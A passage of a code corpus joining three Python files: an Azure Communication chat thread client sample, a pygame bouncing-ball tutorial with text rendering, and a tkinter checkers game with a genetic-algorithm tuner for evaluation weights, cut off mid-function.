See License.txt in the project root for\n# license information.\n# --------------------------------------------------------------------------\n\n\"\"\"\nFILE: chat_thread_client_sample.py\nDESCRIPTION:\n    These samples demonstrate how to create a chat thread client, update a\n    chat thread, get a chat message, list chat messages, update a chat message, send\n    a read receipt, list read receipts, delete a chat message, add participants, remove\n    participants, list participants, and send a typing notification.\n    You need to use the azure.communication.identity module to get a user access\n    token and user identity before running this sample\n\nUSAGE:\n    python chat_thread_client_sample.py\n    Set the environment variables with your own values before running the sample:\n    1) AZURE_COMMUNICATION_SERVICE_ENDPOINT - Communication Service endpoint url\n    2) TOKEN - the user access token, from token_response.token\n    3) USER_ID - the user id, from token_response.identity\n\"\"\"\n\n\nimport os\n\n\nclass ChatThreadClientSamples(object):\n    from azure.communication.identity import CommunicationIdentityClient\n    connection_string = os.environ.get(\"AZURE_COMMUNICATION_SERVICE_CONNECTION_STRING\", None)\n    if not connection_string:\n        raise ValueError(\"Set AZURE_COMMUNICATION_SERVICE_CONNECTION_STRING env before running this sample.\")\n\n    identity_client = CommunicationIdentityClient.from_connection_string(connection_string)\n    user = identity_client.create_user()\n    tokenresponse = identity_client.issue_token(user, scopes=[\"chat\"])\n    token = tokenresponse.token\n\n    endpoint = os.environ.get(\"AZURE_COMMUNICATION_SERVICE_ENDPOINT\", None)\n    if not endpoint:\n        raise ValueError(\"Set AZURE_COMMUNICATION_SERVICE_ENDPOINT env before running this sample.\")\n\n    _thread_id = None\n    _message_id = None\n    new_user = identity_client.create_user()\n\n    def create_chat_thread_client(self):\n        # [START create_chat_thread_client]\n        from datetime import datetime\n        from azure.communication.chat import (\n            ChatClient,\n            CommunicationUserIdentifier,\n            CommunicationTokenCredential,\n            CommunicationTokenRefreshOptions,\n            ChatThreadParticipant\n        )\n        refresh_options = CommunicationTokenRefreshOptions(self.token)\n        chat_client = ChatClient(self.endpoint, CommunicationTokenCredential(refresh_options))\n        topic = \"test topic\"\n        participants = [ChatThreadParticipant(\n            user=self.user,\n            display_name='name',\n            share_history_time=datetime.utcnow()\n        )]\n        chat_thread_client = chat_client.create_chat_thread(topic, participants)\n        # [END create_chat_thread_client]\n        self._thread_id = chat_thread_client.thread_id\n        print(\"chat_thread_client created\")\n\n    def update_topic(self):\n        from azure.communication.chat import ChatThreadClient\n        from azure.communication.chat import CommunicationTokenCredential, CommunicationTokenRefreshOptions\n        refresh_options = CommunicationTokenRefreshOptions(self.token)\n        chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n        # [START update_topic]\n        topic = \"updated thread topic\"\n        chat_thread_client.update_topic(topic=topic)\n        # [END update_topic]\n\n        print(\"update_chat_thread succeeded\")\n\n    def send_message(self):\n        from azure.communication.chat import ChatThreadClient\n        from azure.communication.chat import CommunicationTokenCredential, CommunicationTokenRefreshOptions\n        refresh_options = CommunicationTokenRefreshOptions(self.token)\n        chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n        # [START send_message]\n        
from azure.communication.chat import ChatMessageType\n\n        content = 'hello world'\n        sender_display_name = 'sender name'\n\n        send_message_result_id = chat_thread_client.send_message(\n            content,\n            sender_display_name=sender_display_name)\n\n        send_message_result_w_type_id = chat_thread_client.send_message(\n            content,\n            sender_display_name=sender_display_name, chat_message_type=ChatMessageType.TEXT)\n        # [END send_message]\n\n        self._message_id = send_message_result_id\n        print(\"send_chat_message succeeded, message id:\", self._message_id)\n        print(\"send_message succeeded with type specified, message id:\", send_message_result_w_type_id)\n\n    def get_message(self):\n        from azure.communication.chat import ChatThreadClient\n        from azure.communication.chat import CommunicationTokenCredential, CommunicationTokenRefreshOptions\n        refresh_options = CommunicationTokenRefreshOptions(self.token)\n        chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n        # [START get_message]\n        chat_message = chat_thread_client.get_message(self._message_id)\n        # [END get_message]\n\n        print(\"get_chat_message succeeded, message id:\", chat_message.id, \\\n              \"content: \", chat_message.content)\n\n    def list_messages(self):\n        from azure.communication.chat import ChatThreadClient\n        from azure.communication.chat import CommunicationTokenCredential, CommunicationTokenRefreshOptions\n        refresh_options = CommunicationTokenRefreshOptions(self.token)\n        chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n        # [START list_messages]\n        from datetime import datetime, timedelta\n        start_time = datetime.utcnow() - timedelta(days=1)\n        chat_messages = chat_thread_client.list_messages(results_per_page=1, start_time=start_time)\n\n        print(\"list_messages succeeded with results_per_page is 1, and start time is yesterday UTC\")\n        for chat_message_page in chat_messages.by_page():\n            l = list(chat_message_page)\n            print(\"page size: \", len(l))\n        # [END list_messages]\n\n    def update_message(self):\n        from azure.communication.chat import ChatThreadClient\n        from azure.communication.chat import CommunicationTokenCredential, CommunicationTokenRefreshOptions\n        refresh_options = CommunicationTokenRefreshOptions(self.token)\n        chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n        # [START update_message]\n        content = \"updated content\"\n        chat_thread_client.update_message(self._message_id, content=content)\n        # [END update_message]\n\n        print(\"update_chat_message succeeded\")\n\n    def send_read_receipt(self):\n        from azure.communication.chat import ChatThreadClient\n        from azure.communication.chat import CommunicationTokenCredential, CommunicationTokenRefreshOptions\n        refresh_options = CommunicationTokenRefreshOptions(self.token)\n        chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n        # [START send_read_receipt]\n        chat_thread_client.send_read_receipt(self._message_id)\n        # [END send_read_receipt]\n\n        print(\"send_read_receipt succeeded\")\n\n    def list_read_receipts(self):\n        from azure.communication.chat import ChatThreadClient\n        from azure.communication.chat import CommunicationTokenCredential, CommunicationTokenRefreshOptions\n        refresh_options = CommunicationTokenRefreshOptions(self.token)\n        chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n        # [START 
list_read_receipts]\n read_receipts = chat_thread_client.list_read_receipts()\n print(\"list_read_receipts succeeded, receipts:\")\n for read_receipt in read_receipts:\n print(read_receipt)\n # [END list_read_receipts]\n\n def delete_message(self):\n from azure.communication.chat import ChatThreadClient\n from azure.communication.chat import CommunicationTokenCredential, CommunicationTokenRefreshOptions\n refresh_options = CommunicationTokenRefreshOptions(self.token)\n chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n # [START delete_message]\n chat_thread_client.delete_message(self._message_id)\n # [END delete_message]\n print(\"delete_chat_message succeeded\")\n\n def list_participants(self):\n from azure.communication.chat import ChatThreadClient\n from azure.communication.chat import CommunicationTokenCredential, CommunicationTokenRefreshOptions\n refresh_options = CommunicationTokenRefreshOptions(self.token)\n chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n # [START list_participants]\n chat_thread_participants = chat_thread_client.list_participants()\n print(\"list_chat_participants succeeded, participants: \")\n for chat_thread_participant in chat_thread_participants:\n print(chat_thread_participant)\n # [END list_participants]\n\n def add_participant(self):\n from azure.communication.chat import ChatThreadClient, CommunicationTokenCredential, \\\n CommunicationTokenRefreshOptions\n refresh_options = CommunicationTokenRefreshOptions(self.token)\n chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options),\n self._thread_id)\n # [START add_participant]\n from azure.communication.chat import ChatThreadParticipant\n from datetime import datetime\n new_chat_thread_participant = ChatThreadParticipant(\n user=self.new_user,\n display_name='name',\n share_history_time=datetime.utcnow())\n chat_thread_client.add_participant(new_chat_thread_participant)\n # [END add_participant]\n print(\"add_chat_participant succeeded\")\n\n def add_participants(self):\n from azure.communication.chat import ChatThreadClient, CommunicationTokenCredential, \\\n CommunicationTokenRefreshOptions\n refresh_options = CommunicationTokenRefreshOptions(self.token)\n chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n\n # [START add_participants]\n from azure.communication.chat import ChatThreadParticipant\n from datetime import datetime\n new_participant = ChatThreadParticipant(\n user=self.new_user,\n display_name='name',\n share_history_time=datetime.utcnow())\n thread_participants = [new_participant]\n chat_thread_client.add_participants(thread_participants)\n # [END add_participants]\n print(\"add_chat_participants succeeded\")\n\n def remove_participant(self):\n from azure.communication.chat import ChatThreadClient\n from azure.communication.chat import CommunicationTokenCredential, CommunicationUserIdentifier, CommunicationTokenRefreshOptions\n refresh_options = CommunicationTokenRefreshOptions(self.token)\n chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n\n # [START remove_participant]\n chat_thread_client.remove_participant(self.new_user)\n # [END remove_participant]\n\n print(\"remove_chat_participant succeeded\")\n\n def send_typing_notification(self):\n from azure.communication.chat import 
ChatThreadClient, CommunicationTokenCredential, CommunicationTokenRefreshOptions\n        refresh_options = CommunicationTokenRefreshOptions(self.token)\n        chat_thread_client = ChatThreadClient(self.endpoint, CommunicationTokenCredential(refresh_options), self._thread_id)\n        # [START send_typing_notification]\n        chat_thread_client.send_typing_notification()\n        # [END send_typing_notification]\n\n        print(\"send_typing_notification succeeded\")\n\n    def clean_up(self):\n        print(\"cleaning up: deleting created users.\")\n        self.identity_client.delete_user(self.user)\n        self.identity_client.delete_user(self.new_user)\n\nif __name__ == '__main__':\n    sample = ChatThreadClientSamples()\n    sample.create_chat_thread_client()\n    sample.update_topic()\n    sample.send_message()\n    sample.get_message()\n    sample.list_messages()\n    sample.update_message()\n    sample.send_read_receipt()\n    sample.list_read_receipts()\n    sample.delete_message()\n    sample.add_participant()\n    sample.add_participants()\n    sample.list_participants()\n    sample.remove_participant()\n    sample.send_typing_notification()\n    sample.clean_up()\n","sub_path":"sdk/communication/azure-communication-chat/samples/chat_thread_client_sample.py","file_name":"chat_thread_client_sample.py","file_ext":"py","file_size_in_byte":13064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"111305722","text":"# https://www.bilibili.com/video/av19574503?p=27\n# turn ball to text, using render_to\n# when the left mouse button is pressed, the ball stops\n# while the left button is held and the mouse moves, the ball follows the mouse\n# when the left button is released, the ball resumes moving\nimport pygame,sys\nimport pygame.freetype\n\npygame.init()\nWIN_X = 500\nWIN_Y = 600\nGOLD = 255,251,0\nRED = pygame.Color('red')\nWHITE = 255,255,255\nGREEN = pygame.Color('green')\nBLACK = 0,0,0\npos = [230, 160]\n# create the font object\nicon = pygame.image.load('icon.png')\npygame.display.set_icon(icon)\npygame.display.set_caption('WALL BALL')\nscreen = pygame.display.set_mode((WIN_X,WIN_Y),pygame.RESIZABLE)\n# screen = pygame.display.set_mode((WIN_X,WIN_Y),pygame.NOFRAME)\n# screen = pygame.display.set_mode((WIN_X,WIN_Y),pygame.FULLSCREEN)\n# screen = pygame.display.set_mode((WIN_X,WIN_Y))\n# f1 = pygame.freetype.Font('C://Windows//Fonts//msyh.ttc',36)\nf1 = pygame.freetype.Font(None,36)\nf1rect = f1.render_to(screen,pos,'NASA',fgcolor=GOLD,size=50)\nball_img = 'PYG02-ball.gif'\nspeedx = speedfx = 1\nspeedy = speedfy = 1\n# mark the ball's status\nstill = False\nball = pygame.image.load(ball_img)\nball_rect = ball.get_rect()\nfps = 300\nfclock = pygame.time.Clock()\n\nwhile True:\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            sys.exit()\n        if event.type == pygame.VIDEORESIZE:\n            WIN_X= event.w\n            WIN_Y= event.h\n            screen = pygame.display.set_mode((WIN_X,WIN_Y),pygame.RESIZABLE)\n        \n        if event.type == pygame.MOUSEBUTTONDOWN :\n            if event.button == 1: # left key of mouse\n                still = True\n        if event.type == pygame.MOUSEBUTTONUP:\n            still = False\n            if event.button == 1: # if released, move the ball to the mouse x y\n                ball_rect = ball_rect.move(event.pos[0] - ball_rect.left, event.pos[1] - ball_rect.top)\n        if event.type == pygame.MOUSEMOTION:\n            if event.buttons[0] == 1:\n                ball_rect = ball_rect.move(event.pos[0] - ball_rect.left, event.pos[1] - ball_rect.top)\n\n        if event.type == pygame.KEYDOWN:\n            if event.key == pygame.K_ESCAPE:\n                sys.exit()\n\n            # control speed by direction key\n            if speedy > 0:\n                if event.key == pygame.K_DOWN:\n                    speedy -= 1\n                if event.key == 
pygame.K_UP:\n                    speedy += 1\n            if speedy <= 0:\n                if event.key == pygame.K_DOWN:\n                    speedy += 1\n                if event.key == pygame.K_UP:\n                    speedy -= 1\n            if speedx > 0:\n                if event.key == pygame.K_LEFT:\n                    speedx -= 1\n                if event.key == pygame.K_RIGHT:\n                    speedx += 1\n            if speedx <= 0:\n                if event.key == pygame.K_LEFT:\n                    speedx += 1\n                if event.key == pygame.K_RIGHT:\n                    speedx -= 1\n    # ball_rect = rect(100,200,50,50)\n    # move the ball only while the window is active (not minimized)\n    if pygame.display.get_active() and not still:\n        ball_rect = ball_rect.move(speedx,speedy)\n    if ball_rect.left < 0 or ball_rect.right > WIN_X:\n        speedx = - speedx\n        if ball_rect.left < 0:\n            ball_rect.left = 0\n        if ball_rect.right > WIN_X:\n            ball_rect.right = WIN_X\n    if ball_rect.top < 0 or ball_rect.bottom > WIN_Y:\n        speedy = - speedy\n        if ball_rect.top < 0:\n            ball_rect.top = 0\n        if ball_rect.bottom > WIN_Y:\n            ball_rect.bottom = WIN_Y\n    # print (ball_rect)\n    if pos[0]<0 or pos[0] > WIN_X:\n        speedfx = -speedfx\n    if pos[1]<0 or pos[1] > WIN_Y:\n        speedfy = -speedfy\n    pos[0] = pos[0] + speedfx\n    pos[1] = pos[1] + speedfy\n\n    screen.fill((0,0,0))\n    # render_to must be after the fill\n    f1rect = f1.render_to(screen,pos,'NASA',fgcolor=GOLD,size=50)\n    screen.blit(ball,ball_rect)\n    pygame.display.update()\n    fclock.tick(fps)\n","sub_path":"pygame/wall_ball_04_color_draw_27_wall_ball_fonts_render_to.py","file_name":"wall_ball_04_color_draw_27_wall_ball_fonts_render_to.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"389017470","text":"import tkinter as tk\nfrom shell2 import shell\nimport math\nimport validator\nimport time\nimport random\nimport bisect\nfrom collections import Counter\n\nclass userInterface():\n    def __init__(self):\n        self.winWidth = 525.0 # Width of Window\n        self.winHeight = 525.0 # Height of Window\n        self.canvas = None #Canvas for game board\n        self.master = None #Actual Window\n        self.submitBtn = None\n        self.cancelBtn = None\n        self.numPlayers = None\n        self.color = None\n        self.shell = None\n        self.rightPanel = None\n        self.coefficientsMin = [31.80383373845803, 639.2515612740601, -920.7441256913976, -145.7874428801877, -23.09329824973477, -1.6846182989301675, 0.0005257757963714672, 0.18158759326227403, 149.6959526974644, -3.8918229578659598]\n        self.coefficientsAvg = [9.795873221263307, 18.631363834756527, -5.339231093167362, -9.285311869218145, -0.04377953419784824, -1.4222904052332954, 14.665482314471259, 2.043429450208848, 1.8821118121024654, 0.8792275836293832]\n        self.currentMove = []\n        self.tempBoard = []\n        self.validMoves = None\n        self.potentialMoves = []\n    \n    def buildWindow(self):\n        self.master.destroy()\n        self.master = tk.Tk()\n        mainGrid = tk.Entry(self.master)\n        mainGrid.grid(row=2,column=2)\n        \n        canvPan = tk.Canvas(self.master, width=self.winWidth, height=self.winHeight)\n        canvPan.grid(row=1, column=2)\n        #rightPanel = tk.Text(canvPan, width = 20, height = 25)\n        self.rightPanel = tk.Listbox(canvPan, width = 20, height = 35)\n        scrollBar = tk.Scrollbar(canvPan,orient=\"vertical\", command=self.rightPanel.yview)\n        self.rightPanel.configure(yscrollcommand=scrollBar.set, state=\"normal\")\n        scrollBar.pack(side=\"right\", fill=\"y\")\n        self.rightPanel.pack(side=\"right\")\n        \n        self.canvas = tk.Canvas(self.master, width=self.winWidth, height=self.winHeight)\n        self.canvas.grid(row = 1, column = 1)\n        self.canvas.bind('<Button-1>', self.clickEvent)\n        \n        #buttonGrid = tk.Entry(mainGrid)\n        #buttonGrid.grid(row=1, column=2)\n        self.submitBtn = tk.Button(mainGrid, text=\"Submit\")\n        
self.submitBtn.grid(row=1, column=2)\n        self.submitBtn.bind(\"<Button-1>\", self.submitEvent)\n        self.cancelBtn = tk.Button(mainGrid, text=\"Cancel\")\n        self.cancelBtn.grid(row=1, column=1)\n        self.cancelBtn.bind(\"<Button-1>\", self.cancelEvent)\n        \n    def display(self, board, highlight):\n        self.canvas.delete(\"all\")\n        self.drawBoard()\n        if not highlight == None:\n            self.highlightBoard(highlight)\n        self.drawPieces(board)\n        \n    def drawBoard(self):\n        numRows = 8 #8x8 Board\n        numCols = 8\n        inc = self.winWidth/numRows #Pixels to increment by\n        color1 = '#%02x%02x%02x' % (220, 167, 108)\n        color2 = '#%02x%02x%02x' % (114, 68, 41)\n        for i in range(numRows): #For Every Row\n            for j in range(numCols):#For Every Column\n                x = i*inc #(x,y)\n                y = j*inc\n                if i%2 == 0 and j%2 == 0: #i, j both even => Color 1\n                    self.canvas.create_rectangle(x,y,(i+1)*inc,(j+1)*inc,fill=color1 )\n                \n                elif i%2!=0 and j%2 != 0: #i, j both odd => Color 1\n                    self.canvas.create_rectangle(x,y,(i+1)*inc,(j+1)*inc,fill=color1 )\n                else:\n                    self.canvas.create_rectangle(x,y,(i+1)*inc,(j+1)*inc,fill=color2 )\n                squareX = math.floor(x/inc)\n                squareY = math.floor(y/inc)\n                if squareX%2==0: \n                    squareNum = (squareX)/2 + 1 + 4*squareY\n                else:\n                    squareNum = (squareX-1)/2 + 1 + 4*squareY\n                self.canvas.create_text(x+.15*inc, y+inc*.9, text=int(squareNum))\n    \n    def highlightBoard(self, squares):\n        highlightColor = '#%02x%02x%02x' %(0,0,100)\n        inc = self.winWidth/8\n        for square in squares:\n            y = math.floor((square-1)/4)\n            x = (square-1)%4*2+1 - y%2\n            self.canvas.create_rectangle(x*inc,y*inc, (x+1)*inc, (y+1)*inc, fill=highlightColor)\n    \n    def drawPieces(self, board):\n        blackColor = '#%02x%02x%02x' % (75, 75, 75)\n        redColor = '#%02x%02x%02x' % (105, 0, 0)\n        blackKingColor = '#%02x%02x%02x' % (105, 105, 105)\n        redKingColor = '#%02x%02x%02x' % (135, 0, 0)\n        inc = self.winWidth/8\n        for i in range(len(board)):\n            cy = math.floor((i)/4) #Convert current position to world position\n            cx = (i)%4*2+1 - cy%2\n            cy=(inc/2.0) + cy*inc\n            cx=(inc/2.0) + cx*inc\n            if board[i]==1 or board[i]==3: #Determine Color\n                self.canvas.create_oval(cx-(inc/2.0)*.75, cy-(inc/2.0)*.75, cx+(inc/2.0)*.75, cy+(inc/2.0)*.75, fill = blackColor)\n                if board[i] > 2: #Check for a king\n                    self.canvas.create_oval(cx-(inc/2.0)*.55, cy-(inc/2.0)*.55, cx+(inc/2.0)*.55, cy+(inc/2.0)*.55, fill=blackKingColor)\n            elif board[i]==2 or board[i]==4:\n                self.canvas.create_oval(cx-(inc/2.0)*.75, cy-(inc/2.0)*.75, cx+(inc/2.0)*.75, cy+(inc/2.0)*.75, fill = redColor)\n                if board[i] > 2: #Other color king\n                    self.canvas.create_oval(cx-(inc/2.0)*.55, cy-(inc/2.0)*.55, cx+(inc/2.0)*.55, cy+(inc/2.0)*.55, fill=redKingColor)\n    \n    def getColor(self):\n        color1 = '#%02x%02x%02x' % (75, 75, 75)\n        color2 = '#%02x%02x%02x' % (105, 0, 0)\n        self.master.destroy()\n        self.master = tk.Tk()\n        colorText = tk.Label(self.master, text = \"Select Color\",font=(\"Helvetica\", 15)).pack()\n        self.canvas = tk.Canvas(self.master, width=self.winWidth, height=200)\n        self.canvas.bind(\"<Button-1>\", self.colorSelectEvent)\n        self.canvas.pack()\n        #Top Left, bottom right\n        self.canvas.create_oval(0, 0, 200,200, fill=color1)\n        self.canvas.create_oval(200, 0, 400,200, fill=color2)\n    \n    def numPlayerSelect(self, numPlayers):\n        self.numPlayers = numPlayers\n        if numPlayers==0:\n            self.playGame()\n        elif numPlayers==1:\n            self.getColor()\n        else: #2 Player\n            self.color = 1\n            self.playGame()\n    \n    def colorSelectEvent(self, event):\n        radius = 100\n        #r and center at position (x0,y0) and a point (x1,y1)\n        #Math.sqrt((x1-x0)*(x1-x0) + (y1-y0)*(y1-y0)) < r \n        if math.sqrt(math.pow((event.x - 
100),2) + math.pow((event.y - 100), 2)) < radius:\n #print(\"Black\")\n self.color = -1\n elif math.sqrt(math.pow((event.x - 300),2) + math.pow((event.y - 100), 2)) < radius:\n #print(\"Red\")\n self.color= 1\n if not self.color == None:\n self.playGame()\n \n def clickEvent(self, event):\n if self.numPlayers==2 or self.color == self.shell.turn:\n inc = self.winWidth/8\n # Find which square was clicked\n x = math.floor(event.x/inc)\n y = math.floor(event.y/inc)\n if x%2 != 0 and y%2 == 0 or x%2==0 and y%2!=0:\n if x%2==0: \n squareNum = (x)/2 + 1 + 4*y\n self.currentMove.append(int(squareNum))\n else:\n squareNum = (x-1)/2 + 1 + 4*y\n self.currentMove.append(int(squareNum))\n self.updateMove()\n\n def submitEvent(self, event):\n if len(self.potentialMoves)==1 and self.currentMove == self.potentialMoves[0]:\n self.shell.board = list(self.tempBoard)\n self.shell.turn *= -1\n self.addMoveToWindow(self.currentMove)\n self.currentMove = []\n self.display(self.tempBoard, None)\n self.validMoves= validator.getValidMoves(self.tempBoard, self.shell.turn)\n self.master.update()\n if len(self.validMoves)==0:\n self.gameOver(self.shell.turn*-1)\n elif not self.color == self.shell.turn:\n \n \n \n #engineMove = self.shell.engineMini(self.coefficientsMin)\n engineMove = self.shell.engineAvge(self.coefficientsAvg)\n \n \n \n self.display(self.shell.board, engineMove)\n self.addMoveToWindow(engineMove)\n self.master.update()\n time.sleep(2.5)\n self.tempBoard = list(self.shell.board)\n self.display(self.tempBoard, None)\n self.validMoves= validator.getValidMoves(self.tempBoard, self.shell.turn)\n if len(self.validMoves)==0:\n self.gameOver(self.shell.turn*-1)\n self.master.mainloop()\n \n def cancelEvent(self, event):\n if self.numPlayers==2 or self.color == self.shell.turn:\n self.tempBoard = list(self.shell.board)\n self.currentMove = []\n self.display(self.tempBoard, None)\n \n def updateMove(self):\n self.potentialMoves = self.shell.getPotentialMoves(self.validMoves, self.currentMove) #List of potential Moves\n valid = len(self.potentialMoves) #Valid indicator\n if valid == 0:\n self.currentMove = []\n self.tempBoard= list(self.shell.board)\n self.display(self.tempBoard, None)\n else:\n currLength = len(self.currentMove)\n if currLength!=1:\n self.tempBoard = self.shell.makeMove(self.tempBoard, self.currentMove[currLength-2], self.currentMove[currLength-1])\n self.display(self.tempBoard, self.shell.toHighlight(self.potentialMoves, self.currentMove)) #Display the board and the highlighted squares\n \n def getGameInfo(self):\n color1 = '#%02x%02x%02x' % (220, 167, 108)\n color2 = '#%02x%02x%02x' % (114, 68, 41)\n self.master = tk.Tk()\n numPlayerText = tk.Label(self.master, text = \"Select Number of Players\",font=(\"Helvetica\", 15)).pack()\n button0 = tk.Button(self.master, text=\"0\",font=(\"Helvetica\", 15), command= lambda: self.numPlayerSelect(0), width = 25, height = 5, bg=color1)\n button0.pack(padx=5, pady=10, side=\"left\")\n button1 = tk.Button(self.master, text=\"1\",font=(\"Helvetica\", 15), command= lambda: self.numPlayerSelect(1), width = 25, height = 5, bg=color2)\n button1.pack(padx=5, pady=10, side=\"left\")\n button2 = tk.Button(self.master, text=\"2\",font=(\"Helvetica\", 15), command= lambda: self.numPlayerSelect(2), width = 25, height = 5, bg=color1)\n button2.pack(padx=5, pady=10, side=\"left\")\n self.master.mainloop()\n \n def playGame(self):\n self.buildWindow()\n self.shell = shell()\n self.tempBoard = list(self.shell.board)\n self.display(self.tempBoard, None)\n 
self.validMoves = validator.getValidMoves(self.tempBoard, self.shell.turn)\n #self.master.mainloop()\n self.master.update()\n self.master.update_idletasks()\n if self.numPlayers == 0:\n winner = None\n while not winner:\n if self.shell.turn == -1:\n engineMove = self.shell.engineMini(self.coefficientsMin)\n #engineMove = self.shell.engineMove()\n else:\n engineMove = self.shell.engineAvge(self.coefficientsAvg)\n if engineMove:\n self.display(self.shell.board, engineMove)\n self.addMoveToWindow(engineMove)\n self.master.update()\n time.sleep(.25)\n self.display(self.shell.board, None)\n self.master.update()\n else:\n winner = self.shell.turn\n self.gameOver(self.shell.turn)\n \n elif self.numPlayers == 1:\n if not self.color == self.shell.turn:\n \n \n #engineMove = self.shell.engineMini(self.coefficientsMin)\n engineMove = self.shell.engineAvge(self.coefficientsAvg)\n \n \n self.display(self.shell.board, engineMove)\n self.addMoveToWindow(engineMove)\n self.master.update()\n time.sleep(2.5)\n self.tempBoard = list(self.shell.board)\n self.display(self.tempBoard, None)\n self.validMoves = validator.getValidMoves(self.tempBoard, self.shell.turn)\n else:\n self.validMoves = validator.getValidMoves(self.tempBoard, self.shell.turn)\n \n \n def prepareGenetic(self, numGames):\n self.buildWindow()\n self.drawBoard()\n self.runGenetic(numGames)\n \n def runGenetic(self, iterations):\n coefficients = []\n subCoef = [17.870608421051116, 382.104087415839, -197.8760037558925, -99.5791198228507, -19.85666468717079, -7.1078325370316655, -0.000830428359955046, -1.4547279971100042, 88.53222312332956, -5.200920724125826]\n coefficients.append(subCoef)\n subCoef = [18.336001802421958, 385.42292624812217, -136.32606766487388, -98.46436321058157, 1.7976404507180632e-05, -6.829730767431356, 0.004564062720315796, -1.454722101775636, 87.20600891668526, -5.270479535271417]\n coefficients.append(subCoef)\n subCoef = [18.24292312614779, 384.7591584816655, -148.6360548830776, -98.68731453303539, -19.856640718631446, -6.885351121351418, 0.003485164504261628, -1.4547232808425097, 87.47125175801412, -5.256567773042299]\n coefficients.append(subCoef)\n subCoef = [64.93647287229193, 8.743705836701121, -59.053142534306915, -69.22783191460911, -34.1739292072367, 78.7987847453075, 3.1154154111278984, 52.60740314890384, 69.75743281616226, -84.14429145864864]\n coefficients.append(subCoef)\n subCoef = [18.14984444987362, 384.09539071520885, -160.9460421012813, -98.91026585548921, 5.992134836318996e-06, 6.94097147527148, 0.0024062662882074594, -1.4547244599093834, 87.73649459934298, -5.242656010813181]\n coefficients.append(subCoef)\n subCoef = [18.24292312614779, 384.7591584816655, -148.6360548830776, -98.68731453303539, -19.856640718631446, -6.885351121351418, 0.003485164504261628, -1.4547232808425097, 87.47125175801412, -5.256567773042299]\n coefficients.append(subCoef)\n subCoef = [18.05676577359945, 383.43162294875225, -173.25602931948504, -99.13321717794304, 19.85665270290112, -6.996591829191542, 0.001327368072153291, -1.454725638976257, 88.00173744067183, -5.2287442485840625]\n coefficients.append(subCoef)\n subCoef = [18.24292312614779, 384.7591584816655, -148.6360548830776, -98.68731453303539, -19.856640718631446, -6.885351121351418, 0.003485164504261628, -1.4547232808425097, 87.47125175801412, -5.256567773042299]\n coefficients.append(subCoef)\n \n \n #for i in range(7):\n #subCoef = []\n #for j in range(10):\n #if j in [0,1,8]:\n #ranC = random.uniform(0,100)\n #elif j in [2,3,9]:\n #ranC = random.uniform(-100,0)\n 
#else:\n #ranC = random.uniform(-100,100) \n #subCoef.append(ranC)\n #coefficients.append(subCoef)\n \n for i in range(iterations):\n results = []\n gameNum = 1\n for j in range(0,len(coefficients)-1,2): #For each Coefficient set\n self.playMatch(coefficients,j,j+1,results,i,gameNum)\n gameNum = gameNum + 1\n \n winBrackResults = []\n for j in range(0, 4, 2):\n self.playMatch(coefficients, results[j][3], results[j+1][3], winBrackResults, i, gameNum)\n gameNum = gameNum + 1\n \n loserBrackResults = []\n for j in range(4, 8, 2):\n self.playMatch(coefficients, results[j][3], results[j+1][3], loserBrackResults, i, gameNum)\n gameNum = gameNum + 1\n \n #breed top 2 in win Bracket\n parentA = coefficients[winBrackResults[0][3]]\n parentB = coefficients[winBrackResults[1][3]]\n child = []\n for j in range(len(parentA)):\n child.append((parentA[j]+parentB[j])/2.0)\n #child.append(random.uniform(parentA[j], parentB[j]) \n #if random.random()<.5:\n oldChild = list(child)\n rndm = random.random()\n if rndm < .1: #friendly pawn\n child[0] = self.mutate(child[0], False) \n elif rndm <.2: # friendly king\n child[1] = self.mutate(child[1], False) \n elif rndm <.3: #enemy pawn\n child[2] = self.mutate(child[2], False) \n elif rndm <.4: #enemy king\n child[3] = self.mutate(child[3], False) \n elif rndm <.5: #safe pawns diff\n child[4] = self.mutate(child[4], True) \n elif rndm <.6: #safe kings diff\n child[5] = self.mutate(child[5], True) \n elif rndm <.7: #pawn moves diff\n child[6] = self.mutate(child[6], True) \n elif rndm <.8: #king moves diff\n child[7] = self.mutate(child[7], True) \n elif rndm <.9: #enemy promotion tiles diff\n child[8] = self.mutate(child[8], False) \n else: #pawn distance diff\n child[9] = self.mutate(child[9], False)\n \n children = [oldChild, child]\n childVsMutatedChildResults = []\n self.playMatch(children, 0, 1, childVsMutatedChildResults,i, gameNum)\n gameNum = gameNum + 1\n if childVsMutatedChildResults[0][3] == 0: #Old Child is better\n child = list(oldChild)\n print(\"Old Child wins\")\n \n bestLoserResults = []\n #Play last 2 losers in loser bracket\n #player1 = coefficients[loserBrackResults[2][3]]\n #player2 = coefficients[loserBrackResults[3][3]]\n self.playMatch(coefficients, loserBrackResults[2][3], loserBrackResults[3][3], bestLoserResults, i, gameNum)\n gameNum = gameNum + 1\n winner = bestLoserResults[0][3]\n \n #Loser of losers play bred \n coefficients.append(child)\n loserChildResults = []\n self.playMatch(coefficients, winner, 8, loserChildResults, i, gameNum)\n gameNum = gameNum + 1\n \n if loserChildResults[0][3]==8:\n coefficients[winner] = child\n coefficients = coefficients[:-1]\n \n weightFile = open('weights.txt', 'w')\n for j in range(len(results)):\n weightFile.write(str(coefficients[j])+'\\n')\n weightFile.write(str(results[j]) + '\\n')\n weightFile.write('\\n')\n weightFile.close()\n \n newCoefficients = []\n maxIndex = 